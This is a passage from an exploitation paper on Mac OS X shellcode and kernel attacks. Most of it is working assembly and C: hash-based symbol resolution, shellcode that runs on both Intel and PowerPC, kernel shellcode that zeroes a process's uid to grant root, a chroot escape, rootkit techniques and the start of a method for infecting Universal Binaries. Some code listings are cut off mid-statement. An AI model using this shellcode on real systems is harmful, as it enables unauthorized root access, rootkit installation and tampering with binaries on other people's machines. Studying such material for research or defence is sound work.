the symbol table. The stroff field holds the offset to the string 
table. Both the symbol table and string table are contained in 
the LINKEDIT section.  

By subtracting the symoff from the stroff we get the offset into 
the LINKEDIT section in which to read our strings. The nsyms 
field can be used as a loop count when enumerating the symtab. 
For the sake of this sample code, however, I have assumed that 
the symbol exists and ignored the nsyms field entirely. 

We find the LC_SYMTAB command simply by looping through and 
checking the "cmd" field for 0x2.

The LINKEDIT section is slightly harder to find; we need to look 
for a load command with the cmd type 0x1 (segment_command), 
then check for the name "__LINKEDIT" in the segname field of
the struct. The segment_command struct is shown below:

	struct segment_command {
	    uint32_t cmd; 
	    uint32_t cmdsize; 
	    char segname[16]; 
	    uint32_t vmaddr; 
	    uint32_t vmsize; 
	    uint32_t fileoff; 
	    uint32_t filesize; 
	    vm_prot_t maxprot; 
	    vm_prot_t initprot; 
	    uint32_t nsects; 
	    uint32_t flags; 
	};

I will now run through an explanation of the assembly code 
used to accomplish this technique.

I have used a trivial state machine to loop through each 
load_command until both the symbol table and LINKEDIT virtual 
addresses have been found. 

First we check which type of load_command each is and then we 
jump to the appropriate handler, if it is one of the types we 

	cmp     byte [ecx],0x2  ;# test for LC_SYMTAB (0x2)
	je      found_lcsymtab

	cmp     byte [ecx],0x1  ;# test for LC_SEGMENT (0x1)
	je      found_lcsegment

The next two instructions add the length field of the 
load_command to our pointer. This positions us over the cmd 
field of the next load_command in memory. We jump back up
to the next_header symbol and compare again.

	add     ecx,[ecx + 0x4]   ;# ecx += length 
	jmp     next_header

The found_lcsymtab handler is called when we have a cmd == 0x2.
We make the assumption that there's only one LC_SYMTAB. We can 
use the fact that if we're here, eax hasn't been set yet and is 0.
By comparing this with edx we can see if the LINKEDIT segment has 
been found. After the cmp, we update eax with the address of the 
LC_SYMTAB. If both the LINKEDIT and LC_SYMTAB sections have been 
found, we jmp to the "found_both" symbol, otherwise we process
the next header.
	cmp     eax,edx    ;# use the fact that eax is 0 to test edx.
	mov     eax,ecx    ;# update eax with current pointer.
	jne     found_both ;# we have found LINKEDIT and LC_SYMTAB
	jmp     next       ;# keep looking for LINKEDIT

The found_lcsegment handler is very similar to the 
found_lcsymtab code. However, since there are many LC_SEGMENT 
commands in most files we need to be sure that we've found 
the __LINKEDIT section.

To do this we add 8 to the struct pointer to get to the 
segname[] string. We then check 2 characters in, skipping
the "__" for the 4 bytes "LINK". 0x4b4e494c accounting for
endian issues. Again, we use the fact that there should 
only be one LINKEDIT section. This means that if we are
past the check for "LINK" edx is 0. We use this to test
eax, to see if the LC_SYMTAB command has been found.
Again if we are done we jmp to found_both, if not back 
up to the "next_header" symbol.

	lea     esi,[ecx + 0x8] ;# get pointer to name
	;# test for "LINK"
	cmp     long [esi + 0x2],0x4b4e494c     
	jne     next            ;# it's not LINKEDIT, NEXT!
	cmp     edx,eax         ;# use zero'ed edx to test eax
	mov     edx,ecx         ;# set edx to current address
	jne     found_both      ;# we're done!
	jmp     next            ;# still need to find 
				;# LC_SYMTAB, continue
				;# EDX = LINKEDIT struct
				;# EAX = LC_SYMTAB struct

Now that we have our pointers to LINKEDIT and LC_SYMTAB, we can 
subtract symtab_command.symoff from symtab_command.stroff to 
obtain the offset of the strings table from the start of LINKEDIT.
By adding this offset to LINKEDIT's virtual address, we have now
calculated the virtual address of the string table in memory.

        mov     edi,[eax + 0x10]       ;# EDI = stroff
        sub     edi,[eax + 0x8]        ;# EDI -= symoff
        mov     esi,[edx + 0x18]       ;# esi = VA of linkedit
        add     edi,esi       ;# add virtual address of LINKEDIT to offset

The LINKEDIT section contains a list of "struct nlist" structures.
Each one corresponds to a symbol. The first union contains an offset
into the string table (which we have the VA for). In order to find the 
symbol we want we simply cycle through the array and offset our
string table pointer to test the string.

	struct nlist {
	    union { 
	#ifndef __LP64__ 
		char *n_name; 
	#endif
		int32_t n_strx; 
	    } n_un; 
	    uint8_t n_type; 
	    uint8_t n_sect; 
	    int16_t n_desc; 
	    uint32_t n_value; 
	};

Now that we are able to walk through our nlist structs we are good
to go. However it wouldn't make sense to store the full symbol 
name in our shellcode as this would make the code larger than it 
already is. ;/

I have chosen to steal^H^H^H^Huse skape's "compute_hash" function
from "Understanding Windows Shellcode" [5]. He explains how the 
code works in his paper.

The following code shows a simple loop. First we jump down to the
"hashes" symbol, and call back up to get a pointer to our list of
hashes. We read the first hash in, and then loop through each of
the nlist structures, hashing the symbol found and comparing it
against our precomputed hash.

If the hash is unsuccessful we jump back up to "check_next_hash",
however if it's successful we continue down to the "done" symbol.

;# esi == constant pointer to nlist
;# edi == strtab base

        jmp     hashes
lookup_symbol_up:
        pop     ecx
        mov     ecx,[ecx]           ;# ecx = first hash     
check_next_hash:
        push    esi                 ;# save nlist pointer
        push    edi                 ;# save VA of strtable
        mov     esi,[esi]           ;# *esi = offset from strtab to string
        add     esi,edi             ;# add VA of strtab
        xor edi, edi
        xor eax, eax
compute_hash_again:
        lodsb                       ;# load next byte of the symbol name
        test al, al                 ;# test if on the last byte.
        jz compute_hash_finished
        ror edi, 0xd
        add edi, eax
        jmp compute_hash_again
compute_hash_finished:
        cmp     edi,ecx
        pop     edi
        pop     esi
        je      done
        lea     esi,[esi + 0xc]     ;# Add sizeof(struct nlist)
        jmp     check_next_hash

Each hash we wish to resolve can be appended after the hashes: symbol.

hashes:
        call    lookup_symbol_up
        dd	0x8bd2d84d          ;# hash of "_do_payload"

Now that we have the address of our symbol we're all done and can 
call our function, or modify it as we need.

In order to calculate the hash for our required symbol, I have cut
and pasted some of skape's code into a little C program as follows:

	#include <stdio.h>
	#include <stdlib.h>

	char chsc[] = 

	int main(int ac, char **av)
	{
		long (*hashstr)() = (long (*)())chsc;

		if(ac != 2) {
			fprintf(stderr,"[!] usage: %s <string to hash>\n",*av);
			exit(1);
		}

		printf("[+] Hash: 0x%x\n",hashstr(av[1]));

		return 0;
	}

We can run this as shown below to generate our hash:

-[nemo@fry:~/code/kernelsc]$ ./comphash _do_payload
[+] Hash: 0x8bd2d84d

If the symbol we have resolved is a function that we wish to call
there is a little more we must do before this is possible.

Mac OS X's linker, by default, uses lazy binding for external 
symbols. This means that if our intended function calls another
function in an external library, which hasn't been called elsewhere
in the program already, the dynamic linker will try to resolve
the address as you call it.

For example, a call to execve() with lazy binding will be replaced
with a call to dyld_stub_execve() as shown below:

0x1f54 <do_payload+78>: call   0x301b <dyld_stub_execve>

At runtime this function contains one instruction:

call   0x8fe12f70 <__dyld_fast_stub_binding_helper_interface>

This invokes the dyld which resolves the symbol and replaces this
instruction with a jmp to the real code:

jmp    0x9003b7d0 <execve>

The only problem which this causes is that this function requires
the stack pointer to be correctly aligned, otherwise our code will
crash.

To do this we simply subtract 0xc from our stack pointer before
calling our function.

	This will not be necessary if the program you are 
	exploiting has been compiled with the -bind_at_load flag.

Here is the code I have used to make the call.

        mov     eax,[esi + 0x8] ;# eax == value
        xchg esp,edx            ;# annoyingly large
        sub dl,0xc              ;# way to align the stack pointer
        xchg esp,edx            ;# without null bytes.
        call    eax
        xchg esp,edx            ;# annoyingly large
        add dl,0xc              ;# way to fix up the stack pointer
        xchg esp,edx            ;# without null bytes.

I have written a small sample c program to demonstrate this code
in action.

The following code has no call to do_payload(). The shellcode will
resolve the address of this function and call it.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char symresolve[] =
"\x4d\xd8\xd2\x8b"; // HASH

void do_payload()
{
        char *args[] = {"/usr/bin/id",NULL};
        char *env[]  = {"TERM=xterm",NULL};

        printf("[+] Executing id.\n");
        execve(*args,args,env);
}

int main(int ac, char **av)
{
        void (*fp)() = (void (*)())symresolve;

        fp();
        return 0;
}
As you can see below this code works as you'd expect.

-[nemo@fry:~]$ ./testsymbols 
[+] Executing id.
uid=501(nemo) gid=501(nemo) groups=501(nemo)

The full assembly listing for the method shown in this section
can be found in the Appendix of this paper.

I originally worked on this method for resolving kernel symbols.

Unfortunately, the kernel jettisons (free()'s) the LINKEDIT section
after it boots. Before doing this, it writes out the mach-o file 
/mach.sym containing the symbol information for the kernel.

If you set the boot flag "keepsyms" the LINKEDIT section will 
not be free()'ed and the symbols will remain in kernel memory.

In this case we can use the code shown in this section, and 
simply scan memory starting from the address 0x1000 until we 
find 0xfeedface. Here is some assembly code to do this:

        xor     eax,eax
        inc     eax
        shl     eax,0xc         ;# eax = 0x1000
        mov     ebx,0xfeedface  ;# ebx = 0xfeedface
        inc     eax
        inc     eax
        inc     eax
        inc     eax             ;# eax += 4
        cmp     ebx,[eax]       ;# if(*eax != ebx) {
        jnz     up              ;#      goto up }

After this is done we can resolve kernel symbols as needed.

--[ 4 - Architecture Spanning Shellcode

Since the move from PowerPC to Intel architecture it has become 
common to find both PowerPC and Intel Macs running Mac OS X in
the wild. On top of this, Mac OS X 10.4 ships with binary translation
technology from Transitive called Rosetta, which allows an Intel Mac 
to execute a PowerPC binary.  This means that even after you've 
finger-printed the architecture of a machine as Intel, there's a 
chance a network facing daemon might be running PowerPC code. This 
poses a challenge when writing remote exploits, as incorrectly 
fingerprinting the architecture of the machine will result in 
failure.

In order to remedy this a technique can be used to create 
shellcode which executes on both Intel and PowerPC architecture.

This technique has been documented in the Phrack article of the same
name as this section [16]. 
I provide a brief explanation here as this technique is used 
throughout the remainder of the paper.

The basic premise of this technique is to find a PowerPC instruction
which, when executed, will simply step forward one instruction. It
must do this without performing any memory access, only changing the
state of the registers. When this instruction is interpreted as Intel
opcodes however, a jump must be performed. This jump must be over the
PowerPC portion of the code and into the Intel instructions. In this 
way the architecture type can be determined.

A suitable PowerPC instruction exists: the "rlwnm" instruction.

The following is the definition of this instruction, taken from the
PowerPC manual:

(rlwnm) Rotate Left Word then AND with Mask (x'5c00 0000')

rlwnm  	rA,rS,rB,MB,ME	(Rc = 0) 
rlwnm. 	rA,rS,rB,MB,ME	(Rc = 1) 

|10101 |   S    |     A    |    B    |   MB    |   ME    |Rc|
0     5 6     10 11      15 16     20 21     25 26       30 31

This is the rotate left instruction on PowerPC. The register rS is
rotated left by the number of bits specified in rB, a mask (defined
by the bits MB to ME) is applied, and the result is stored in rA.
No memory access is made by this instruction regardless of the
arguments given.

By using the following parameters for this instruction we can
end up with a valid and useful opcode.

	rA = 16
	rS = 28
	rB = 29
	MB = XX
	ME = XX
	rlwnm r16,r28,r29,XX,XX

This leaves us with the opcode:

	5f 90 eb XX

When this is broken down as Intel code it becomes the following 
instructions:

nasm > db 0x5f,0x90,0xeb,0xXX
00000000  5F                pop edi	    // pop a value off the stack
00000001  90                nop		    // do nothing.
00000002  EBXX              jmp short 0xXX  // jump to our payload.

Here is a small example of how this can be useful.

	char trap[] =
	"\x5f\x90\xeb\x06"	// magic arch selector
	"\x7f\xe0\x00\x08"	// trap ppc instruction
	"\xcc\xcc\xcc\xcc";	// intel: int3 int3 int3 int3

This shellcode when executed on PowerPC architecture will 
execute the "trap" instruction directly below our selector code.
However when this is interpreted as Intel architecture instructions
the "eb 06" causes a short jump into the int3 instructions. Note
that the displacement of a short jmp is counted from the end of the
two-byte jmp instruction itself (offset 4 here), not from the "eb"
byte; "eb 06" therefore lands at offset 10, two bytes into the int3
padding, which is why gdb below stops at trap+11.

To verify that this multi-arch technique works, here is the output 
of gdb when attached to this process on Intel architecture:

	Program received signal SIGTRAP, Trace/breakpoint trap.
	0x0000201b in trap ()
	(gdb) x/i $pc
	0x201b <trap+11>:       int3  

Here is the same output from a PowerPC version of this binary:

	Program received signal SIGTRAP, Trace/breakpoint trap.
	0x00002018 in trap ()
	(gdb) x/i $pc
	0x2018 <trap+4>:        trap

--[ 5 - Writing Kernel level shellcode

In this section we will look at some techniques for writing shellcode
for use when exploiting kernel level vulnerabilities.

A couple of things to note before we begin. Mac OS X does not share an 
address space between kernel and userspace. The kernel and userspace
each have a 4gb address space (0x0 -> 0xffffffff).

I did not bother writing PowerPC code again for most of what I've
done. If you really want PowerPC code, some concepts here will port
quickly; others require a little thought ;).

--[ 5.1 - Local privilege escalation

The first type of kernel shellcode we will look at writing is for
local vulnerabilities. The typical objective for local kernel
shellcode is simply to escalate the privileges of our userspace
process.

This topic was covered in noir's excellent paper on OpenBSD kernel 
exploitation in Phrack 60. [6]

A lot of the techniques from noir's paper apply directly to Mac OS X.
noir shows that the sysctl() function can be used to retrieve the  
kinfo_proc struct for a particular process id. As you can see below
one of the members of the kinfo_proc struct is a pointer to the proc 
struct of the process:

struct kinfo_proc {
        struct  extern_proc kp_proc;             /* proc structure */
        struct  eproc {
                struct  proc *e_paddr;          /* address of proc */
                struct  session *e_sess;        /* session pointer */
                struct  _pcred e_pcred;         /* process credentials */
                struct  _ucred e_ucred;         /* current credentials */
                struct   vmspace e_vm;          /* address space */
                pid_t   e_ppid;                 /* parent process id */
                pid_t   e_pgid;                 /* process group id */
                short   e_jobc;                 /* job control counter */
                dev_t   e_tdev;                 /* controlling tty dev */
                pid_t   e_tpgid;                /* tty process group id */
                struct  session *e_tsess;       /* tty session pointer */
#define WMESGLEN        7
                char    e_wmesg[WMESGLEN+1];    /* wchan message */
                segsz_t e_xsize;                /* text size */
                short   e_xrssize;              /* text rss */
                short   e_xccount;              /* text references */
                short   e_xswrss;
                int32_t e_flag;
#define EPROC_CTTY      0x01    /* controlling tty vnode active */
#define EPROC_SLEADER   0x02    /* session leader */
#define COMAPT_MAXLOGNAME       12
                char e_login[COMAPT_MAXLOGNAME];/* short setlogin() name*/
                int32_t e_spare[4];
        } kp_eproc;
};

Ilja van Sprundel mentioned this technique in his talk at Blackhat [7].
Basically, we can use the leaked address "p.kp_eproc.e_paddr" to access
the proc struct for our process in memory.

The following function will return the address of a pid's proc struct 
in the kernel.

long get_addr(pid_t pid) {
        int i, mib[4];
        size_t sz = sizeof(struct kinfo_proc);
        struct kinfo_proc p;

        mib[0] = CTL_KERN;
        mib[1] = KERN_PROC;
        mib[2] = KERN_PROC_PID;
        mib[3] = pid;

        i = sysctl(mib, 4, &p, &sz, NULL, 0);
        if (i == -1) {
                perror("sysctl");
                return -1;
        }

        return (long)p.kp_eproc.e_paddr;
}

Now that we have the address of our proc struct, we simply have to 
change our uid and/or euid in their respective structures.

Here is a snippet from the proc struct:

struct  proc {
        LIST_ENTRY(proc) p_list;        /* List of all processes. */

        /* substructures: */
        struct  ucred *p_ucred;         /* Process owner's identity. */
        struct  filedesc *p_fd;         /* Ptr to open files structure. */
        struct   pstats *p_stats; /* Accounting/statistics (PROC ONLY). */
        struct  plimit *p_limit;        /* Process limits. */
        struct  sigacts *p_sigacts;
	/* Signal actions, state (PROC ONLY). */

As you can see, following the p_list there is a pointer to the 
ucred struct. This struct is shown below.

struct _ucred {
        int32_t cr_ref;                 /* reference count */
        uid_t   cr_uid;                 /* effective user id */
        short   cr_ngroups;             /* number of groups */
        gid_t   cr_groups[NGROUPS];     /* groups */
};

By changing the cr_uid field in this struct, we set the euid of
our process. 

The following assembly code will seek to this struct and null
out the ucred cr_uid field. This leaves us with root
privileges on an Intel platform.

        mov     ebx, [0xdeadbeef]       ;# ebx = proc address
        mov     ecx, [ebx + 8]          ;# ecx = ucred
        xor     eax,eax
        mov     [ecx + 12], eax         ;# zero out the euid

To use this code we need to replace the address 0xdeadbeef with
the address of the proc struct which we looked up earlier.

Here is some code from Ilja van Sprundel's talk which does the
same thing on a PowerPC platform.

int kshellcode[] = { 
	0x3ca0aabb, // lis r5, 0xaabb 
	0x60a5ccdd, // ori r5, r5, 0xccdd 
	0x80c5ffa8, // lwz r6, -88(r5) 
	0x80e60048, // lwz r7, 72(r6) 
	0x39000000, // li r8, 0 
	0x9106004c, // stw r8, 76(r6) 
	0x91060050, // stw r8, 80(r6) 
	0x91060054, // stw r8, 84(r6) 
	0x91060058, // stw r8, 88(r6) 
	0x91070004  // stw r8, 4(r7) 
};

We can combine the two shellcodes into one architecture 
spanning shellcode. This is a simple process and is 
documented in section 4 of this paper.

The full listing for our multi-arch code is shown
in the Appendix.

On PowerPC processors XNU uses an optimization referred to 
as the "user memory window". This means that the user address
space and the kernel address space share some mappings.

This design is in place for copyin/copyout etc to use.
The user memory window typically starts at 0xe0000000 in both
the kernel and user address space. This can be useful when 
trying to position shellcode for use in local privilege 
escalation vulnerabilities.

--[ 5.2 - Breaking chroot()

Before we look into how we can go about breaking out of
processes after they have used the chroot() syscall, we 
will take a look at why, a lot of the time, we don't need to.

-[root@fry:/chroot]# touch file_outside_chroot

-[root@fry:/chroot]# ls -lsa file_outside_chroot 
0 -rw-r--r--   1 root  admin  0 Jan 29 12:17 file_outside_chroot

-[root@fry:/chroot]# chroot demo /bin/sh

-[root@fry:/]# ls -lsa file_outside_chroot
ls: file_outside_chroot: No such file or directory

-[root@fry:/]# pwd                        
/

-[root@fry:/]# ls -lsa ../file_outside_chroot
0 -rw-r--r--   1 root  admin  0 Jan 29 20:17 ../file_outside_chroot

-[root@fry:/]# ../../usr/sbin/chroot ../../ /bin/sh

-[root@fry:/]# ls -lsa /chroot/file_outside_chroot 
0 -rw-r--r--   1 root  admin  0 Jan 29 12:17 /chroot/file_outside_chroot

As you can see, the /usr/sbin/chroot command which ships
with Mac OS X does not chdir() and therefore does not 
really do very much at all.

The author suggests the following addition be made to the
chroot man page on Mac OS X:

	"Caution: Does not work."

On an unrelated note, this patch would also be suitable for
the setreuid() man page.

I won't spend too much time on this since noir already 
covered it really well in his paper. [6]

Basically as noir mentions, all we need to do to break our 
process out of the chroot() is to set the p->p_fd->fd_rdir
element in our proc struct to NULL.

We can get the address of our proc struct using sysctl as
mentioned earlier.

noir already provides us with the instructions for this:

mov	edx,[ecx + 0x14] 	;# edx = p->p_fd
mov	[edx + 0xc],eax		;# p->p_fd->fd_rdir = 0

(Note that the 0x14 offset is from noir's OpenBSD target; on XNU you
need to adjust it to match the proc struct layout shown earlier.)

--[ 5.3 -  Advancements 

Now that we are familiar with writing shellcode for use
in local exploits, where we already have local access to 
the box, the rest of the kernel related code in this paper
will focus on accomplishing its task without requiring any
userspace access. 

In order to do this, we can utilize the per-cpu, task, proc 
and thread structures in the kernel. The definitions for 
each of these structures can be found in various header files 
in the osfmk/kern and bsd/sys directories.

The first struct which we will look at is the "cpu_data"
struct found in osfmk/i386/cpu_data.h.

I have included the definition for this struct below:

/*
 * Per-cpu data.
 *
 * Each processor has a per-cpu data area which is dereferenced through
 * the current_cpu_datap() macro. For speed, the %gs segment is based
 * here, and using this, in-lines provides single-instruction access to
 * frequently used members - such as get_cpu_number()/cpu_number(), and
 * get_active_thread()/current_thread().
 *
 * Cpu data owned by another processor can be accessed using the
 * cpu_datap(cpu_number) macro which uses the cpu_data_ptr[] array of
 * per-cpu pointers.
 */
typedef struct cpu_data
{
        struct cpu_data         *cpu_this;        /* pointer to myself */
        thread_t                cpu_active_thread;
        void                    *cpu_int_state;     /* interrupt state */
        vm_offset_t             cpu_active_stack;  /* kernel stack base */
        vm_offset_t             cpu_kernel_stack;  /* kernel stack top */
        vm_offset_t             cpu_int_stack_top;
        int                     cpu_preemption_level;
        int                     cpu_simple_lock_count;
        int                     cpu_interrupt_level;
        int                     cpu_number;             /* Logical CPU */
        int                     cpu_phys_number;        /* Physical CPU */
        cpu_id_t                cpu_id;              /* Platform Expert */
        int                     cpu_signals;            /* IPI events */
        int                     cpu_mcount_off;    /* mcount recursion */
        ast_t                   cpu_pending_ast;
        int                     cpu_type;
        int                     cpu_subtype;
        int                     cpu_threadtype;
        int                     cpu_running;
        uint64_t                rtclock_intr_deadline;
        rtclock_timer_t         rtclock_timer;
        boolean_t               cpu_is64bit;
        task_map_t              cpu_task_map;
        addr64_t                cpu_task_cr3;
        addr64_t                cpu_active_cr3;
        addr64_t                cpu_kernel_cr3;
        cpu_uber_t              cpu_uber;
        void                    *cpu_chud;
        void                    *cpu_console_buf;
        struct cpu_core         *cpu_core;         /* cpu's parent core */
        struct processor        *cpu_processor;
        struct cpu_pmap         *cpu_pmap;
        struct cpu_desc_table   *cpu_desc_tablep;
        struct fake_descriptor  *cpu_ldtp;
        cpu_desc_index_t        cpu_desc_index;
        int                     cpu_ldt;
#ifdef MACH_KDB
        /* XXX Untested: */
        int                     cpu_db_pass_thru;
        vm_offset_t     cpu_db_stacks;
        void            *cpu_kdb_saved_state;
        spl_t           cpu_kdb_saved_ipl;
        int                     cpu_kdb_is_slave;
        int                     cpu_kdb_active;
#endif /* MACH_KDB */
        boolean_t               cpu_iflag;
        boolean_t               cpu_boot_complete;
        int                     cpu_hibernate;
        pmsd                    pms; /* Power Management Stepper control */
        uint64_t            rtcPop; /* when the etimer wants a timer pop */

        vm_offset_t     cpu_copywindow_base;
        uint64_t        *cpu_copywindow_pdp;

        vm_offset_t     cpu_physwindow_base;
        uint64_t        *cpu_physwindow_ptep;
        void            *cpu_hi_iss;
        boolean_t       cpu_tlb_invalid;

        uint64_t        *cpu_pmHpet; 
	/* Address of the HPET for this processor */
        uint32_t        cpu_pmHpetVec;  
	/* Interrupt vector for HPET for this processor */
/*      Statistics */
        pmStats_t       cpu_pmStats;  
	/* Power management data */
        uint32_t        cpu_hwIntCnt[256];         /* Interrupt counts */

        uint64_t                cpu_dr7; /* debug control register */
} cpu_data_t;

As you can see, this structure contains valuable information 
for our shellcode running in the kernel. We just need to 
figure out how to access it.

The following macro shows how we can access this structure.

/* Macro to generate inline bodies to retrieve per-cpu data fields. */
#define offsetof(TYPE,MEMBER) ((size_t) &((TYPE *)0)->MEMBER)
#define CPU_DATA_GET(member,type)                                       \
        type ret;                                                       \
        __asm__ volatile ("movl %%gs:%P1,%0"                            \
                : "=r" (ret)                                            \
                : "i" (offsetof(cpu_data_t,member)));                   \
        return ret;

When our code is executing in kernel space the gs selector can be used
to access our cpu_data struct. The first element of this struct
contains a pointer to the struct itself, so we no longer need to
use gs after this.

The first objective we will look at is the ability to find the
init process (pid=1) via this struct. Since our code may not
be running with an associated user space thread, we cannot count
on the uthread struct being populated in our thread_t struct.
An example of this might be when we exploit a network stack or
kernel extension.

The first step we must make to find the init process struct
is to retrieve the pointer to our thread_t struct.

We can do this by simply retrieving the pointer at gs:0x04.
The following instructions will achieve this:

        xor     ebx,ebx				;# zero ebx
        mov     eax,[gs:0x04 + ebx]             ;# thread_t.

After these instructions are executed, we have a pointer to 
our thread struct in eax. The thread struct is defined in 
osfmk/kern/thread.h. A portion of this struct is shown below:

struct thread {
        queue_chain_t   links;          /* run/wait queue links */
        run_queue_t     runq;   /* run queue thread is on SEE BELOW */
        wait_queue_t    wait_queue;  /* wait queue we are currently on */
        event64_t               wait_event;       /* wait queue event */
        integer_t               options;/* options set by thread itself */
  /* Data used during setrun/dispatch */
        timer_data_t            system_timer;  /* system mode timer */
        processor_set_t         processor_set;/* assigned processor set */
        processor_t bound_processor; /* bound to a processor? */
        processor_t last_processor;     /* processor last dispatched on */
        uint64_t    last_switch;        /* time of last context switch */
	void                                    *uthread;

This struct, again, contains many fields which are useful 
for our shellcode. However, in this case we are trying to
find the proc struct. Because we might not necessarily 
already have a uthread associated with us, as mentioned 
earlier, we must look elsewhere for a list of tasks to 
locate init (launchd). 

The next step in this process is to retrieve the 
"last_processor" element from our thread_t struct.
We do this using the following instructions: 

        mov     bl,0xf4
        mov     ecx,[eax + ebx]                 ;# last_processor

The last_processor pointer points to a processor 
struct as the name suggests ;) We can walk from the
last_processor struct back to the default pset in 
order to find the pset which contains init.

        mov     eax,[ecx]                       ;# default_pset + 0xc

We then retrieve the task head from this struct.

        push    word 0x458
        pop     bx
        mov     eax,[eax + ebx]                 ;# tasks head.

And retrieve the bsd_info element of the task.
This is a proc struct pointer.

        push    word 0x19c
        pop     bx
        mov     eax,[eax + ebx]                 ;# get bsd_info

The proc struct is defined in xnu/bsd/sys/proc_internal.h.
The first element of the proc struct is:

        LIST_ENTRY(proc) p_list;        /* List of all processes. */

We can walk this list to find a particular process that we want. 
For most of our code we will start with a pointer to the init 
process (launchd on Mac OS X). This process has a pid of 1.

To find this we simply walk the list checking the pid field 
at offset 36. The code to do this is as follows:

next_proc:
        mov     eax,[eax+4]                     ;# prev         
        mov     ebx,[eax + 36]                  ;# pid
        dec     ebx
        test    ebx,ebx                         ;# if pid was 1
        jnz     next_proc
;#      eax = struct proc *init;

Now that we have developed code which will retrieve a pointer
to the proc struct for the init process, we can look at some 
of the things that we can accomplish using this pointer.

The first thing which we will look at is simply rewriting the 
privilege escalation code listed earlier. Our new version of 
this code will not require any help from userspace (sysctl etc).

I think the below code is fairly self explanatory.

%define PID 1337

find_pid:
        mov     eax,[eax + 4]                   ;# eax = next proc
        mov     ebx,[eax + 36]                  ;# pid
        cmp     bx,PID
        jnz     find_pid
        mov     ecx, [eax + 8]          ;# ecx = ucred
        xor     eax,eax
        mov     [ecx + 12], eax         ;# zero out the euid

As you can see the cpu_data struct opens up many possibilities 
for our shellcode. Hopefully I will have time to go into some 
of these in a future paper.

--[ 6 - Misc Rootkit Techniques

In this section I will run over a few short pieces of 
information which might be relevant to someone who is 
developing a rootkit for Mac OS X. I didn't really have 
another place to put this stuff, so this will have to do.

The first thing to note is that an API exists [21] for 
executing userspace applications from kernelspace. This 
is called the Kernel User Notification Daemon. This is 
implemented using a mach port which the kernel uses to 
communicate with a userspace daemon named kuncd.

The file xnu/osfmk/UserNotification/UNDRequest.defs 
contains the Mach Interface Generator (MIG) interface
definitions for the communication with this daemon.

The mach port is called "[UNC]Notifications" and is registered by
the daemon /usr/libexec/kuncd.

Here is an example of how to use this interface 
programmatically. The interface allows you to display
messages via the GUI to the user, and also run any 
application.

kern_return_t ret;
ret = KUNCExecute(

There may be a situation where you wish to execute code on all the 
processors on a system. This may be something like updating the IDT 
or an MSR, where you do not want a processor to miss out on the change.

The xnu kernel provides a function for this. The comment and prototype 
explain this a lot better than I can. So here you go:

/*
 * All-CPU rendezvous:
 *      - CPUs are signalled,
 *      - all execute the setup function (if specified),
 *      - rendezvous (i.e. all cpus reach a barrier),
 *      - all execute the action function (if specified),
 *      - rendezvous again,
 *      - execute the teardown function (if specified), and then
 *      - resume.
 *
 * Note that the supplied external functions _must_ be reentrant and aware
 * that they are running in parallel and in an unknown lock context.
 */

mp_rendezvous(void (*setup_func)(void *),
              void (*action_func)(void *),
              void (*teardown_func)(void *),
              void *arg)

The code for these functions is stored in 
--[ 7 - Universal Binary Infection

The Mach-O object format is used on operating systems which have
a kernel based on Mach. This is the format which is used by 
Mac OS X. Significant work has already been done regarding the
infection of this format. The papers [12] and [13] show some of
this. Mach-O files can be identified by the first four bytes of 
the file which contain the magic number 0xfeedface.

Recently Mac OS X has moved from the PowerPC platform to Intel 
architecture. This move has caused a new binary format to be 
used for most of the applications on Mac OS X 10.4. The Universal
Binary format is defined in the Mach-O Runtime reference from 
Apple. [4].

The Universal Binary format is a fairly trivial archive format
which allows for multiple Mach-O files of varying architecture
types to be stored in a single file. The loader on Mac OS X is 
able to interpret this file and distinguish which of the Mach-O
files inside the archive matches the architecture type of the 
current system. (We'll look at this a little more later.)

The structures used by Mac OS X to define and parse Universal
binaries are contained in the file /usr/include/mach-o/fat.h.

Universal binaries are recognizable, again, by the magic number
in the first four bytes of the file. Universal binaries begin 
with the following header:

struct fat_header {
	uint32_t        magic;          /* FAT_MAGIC */
	uint32_t        nfat_arch;      /* number of structs that follow */
};

The magic number on a universal binary is as follows:

#define FAT_MAGIC       0xcafebabe
#define FAT_CIGAM       0xbebafeca      /* NXSwapLong(FAT_MAGIC) */

Either FAT_MAGIC or FAT_CIGAM is used depending on the endian of
the file/system.

The nfat_arch field of this structure contains the number of 
Mach-O files of which the archive is comprised. On a side note
if you set this high enough to wrap, just about every debugging
tool on Mac OS X will crash, as demonstrated below:

-[nemo@fry:~]$ printf "\xca\xfe\xba\xbe\x66\x66\x66\x66" > file
-[nemo@fry:~]$ otool -tv file
Segmentation fault

For each of the Mach-O files in the Universal binary there 
is also a fat_arch structure.

This structure is shown below:

struct fat_arch {
        cpu_type_t      cputype;     /* cpu specifier (int) */
        cpu_subtype_t   cpusubtype;  /* machine specifier (int) */
        uint32_t        offset;      /* file offset to this object file */
        uint32_t        size;        /* size of this object file */
        uint32_t        align;       /* alignment as a power of 2 */
};

The fat_arch structure defines the architecture type of the
Mach-O file, as well as the offset into the Universal binary
in which it is stored. It also contains the alignment of the
architecture for the particular file, expressed as a power
of 2.

The diagram below describes the layout of a typical Universal binary:

|0xcafebabe                                       |
|   struct fat_header                             |
|-------------------------------------------------|
| fat_arch struct #1                              |------------+
|-------------------------------------------------|            |
| fat_arch struct #2                              |---------+  |
|-------------------------------------------------|         |  |
| fat_arch struct #n                              |------+  |  |
|-------------------------------------------------|      |  |  |
|0xfeedface                                       |<-----|--|--+
|                                                 |      |  |
|    Mach-O File #1                               |      |  |
|                                                 |      |  |
|-------------------------------------------------|      |  |
|0xfeedface                                       |<-----|--+
|                                                 |      |
|    Mach-O File #2                               |      |
|                                                 |      |
|-------------------------------------------------|      |
|0xfeedface                                       |<-----+
|                                                 |
|    Mach-O file #n                               |
|                                                 |
|-------------------------------------------------|

Here you can see the file beginning with a fat_header
structure. Following this are n * fat_arch structures
each defining the offset into the file to find the
particular Mach-O file described by the structure.
Finally n * Mach-O files are appended to the structs.

Before I run through the method for infecting Universal
binaries I will first show how the kernel loads them.

The file:  xnu/bsd/kern/kern_exec.c contains the code
shown in this section.

First the kernel sets up a NULL terminated array of 
execsw structs. Each of these structures contains a 
function pointer to an image activator / parser for 
the different image types, as well as a string 
describing the image type.
The definition and declaration of this array is shown 
below:
/*
 * Our image activator table; this is the table of the image types we are
 * capable of loading.  We list them in order of preference to ensure the
 * fastest image load speed.
 *
 * XXX hardcoded, for now; should use linker sets
 */
struct execsw {
        int (*ex_imgact)(struct image_params *);
        const char *ex_name;
} execsw[] = {
        { exec_mach_imgact,             "Mach-o Binary" },
        { exec_fat_imgact,              "Fat Binary" },
